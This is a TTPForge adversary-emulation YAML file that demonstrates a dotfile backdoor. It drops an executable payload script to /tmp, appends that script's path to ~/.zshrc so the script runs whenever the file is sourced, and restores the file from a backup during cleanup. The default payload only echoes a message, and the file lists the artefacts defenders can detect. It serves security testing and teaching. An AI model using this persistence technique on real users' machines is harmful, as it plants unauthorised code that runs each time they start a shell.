
---
# Example TTP: appends a line to a shell dotfile so that a dropped payload
# script runs when the file is next sourced, then reverts the change during
# cleanup. Intended as a walkthrough of TTPForge features (see `description`).
# For defenders: the observable artefacts are a new executable in a temp
# directory, a modified shell rc file, and a backup copy of that rc file.
api_version: 2.0
# Identifier for this TTP.
uuid: 4fdffbb9-714a-4489-b7c7-1af99d213681
name: dotfile_backdoor
description: |
  This TTP demonstrates the core features of TTPForge:
    - Various Attacker Actions Implemented as Executable YAML
    - Simple but powerful Command-line Argument Support
    - Last-in-First-Out Cleanup Execution
    - Checking Conditions at Runtime to Avoid Errors
# Test case for the TTPForge test runner: a dry run with every argument at its
# default. NOTE(review): assumes dry_run validates the steps without executing
# them — confirm against the TTPForge dry_run semantics.
tests:
  - name: default
    description: dry run with the default settings
    dry_run: true
# Command-line arguments; each is referenced below as {{.Args.<name>}}.
# NOTE(review): the templated values are left unquoted on the assumption that
# TTPForge renders the Go template before parsing the YAML — confirm.
args:
  - name: target_file_path
    type: path
    description: The file that we should try to backdoor
    # NOTE(review): leading `~` is left for the `path` argument type to
    # expand — confirm that the type performs home-directory expansion.
    default: ~/.zshrc
  - name: payload_file_path
    type: path
    description: |
      The path to which we should write the payload file.
      The backdoor we insert into the target file will reference this
      payload.
    default: /tmp/ttpforge-dotfile-backdoor-demo-payload.sh
  # No `type:` here, so this is a free-form string; it is written verbatim
  # into the payload script body below.
  - name: payload_cmd
    description: |
      The shell command that our payload should execute
    default: echo 'Hello from TTPForge! You have been pwned!'
  - name: backup_file_path
    type: path
    description: |
      The file path to which the target file should be backed up
    default: /tmp/ttpforge-dotfile-backdoor-backup
steps:
  # Step 1: guard. The `path_exists` check stops the TTP early, reporting
  # `msg`, if the target dotfile is absent — avoiding a failed edit later.
  - name: verify_dotfile_exists
    description: |
      Uses the `checks:` feature to verify that the target file
      actually exists before we try to write to it
    print_str: |
      Verifying that {{.Args.target_file_path}} exists...
    checks:
      - path_exists: {{.Args.target_file_path}}
        msg: "Target file {{.Args.target_file_path}} must exist"
  # Step 2: drop the payload script. Its body is a bash shebang, a marker
  # comment, and the user-supplied payload_cmd. `cleanup: default` presumably
  # removes the created file at cleanup time — confirm against the
  # create_file action documentation.
  - name: create_payload_file
    description: |
      This step uses the `create_file:` action to drop our payload to disk
    create_file: {{.Args.payload_file_path}}
    contents: |
      #!/bin/bash
      # Created by TTPForge
      {{.Args.payload_cmd}}
    # Octal permission literal (rwxr-xr-x) so the payload is executable.
    # NOTE(review): kept as a bare number — YAML 1.1-style loaders read the
    # leading 0 as octal, and quoting it would change the value's type;
    # confirm the loader in use before reformatting.
    mode: 0755
    cleanup: default
  # Step 3: the persistence change. The target file is copied to
  # backup_file_path first, then the payload path is appended so the shell
  # runs it when the rc file is sourced. Cleanup copies the backup back over
  # the target, reverting the edit. Because cleanup runs last-in-first-out
  # (see `description`), this restore runs before step 2's cleanup.
  - name: backdoor_target_file
    edit_file: {{.Args.target_file_path}}
    backup_file: {{.Args.backup_file_path}}
    edits:
      - append: |
          # ADDED BY TTPFORGE - SHOULD BE CLEANED UP AUTOMATICALLY
          # BUT IF NOT YOU CAN DELETE THIS :)
          {{.Args.payload_file_path}}
    # NOTE(review): this restore assumes backup_file_path was written by the
    # edit above; if the edit step never ran, `cp` fails at cleanup — confirm
    # how TTPForge orders cleanup for steps that did not execute.
    cleanup:
      inline: |
        cp {{.Args.backup_file_path}} {{.Args.target_file_path}}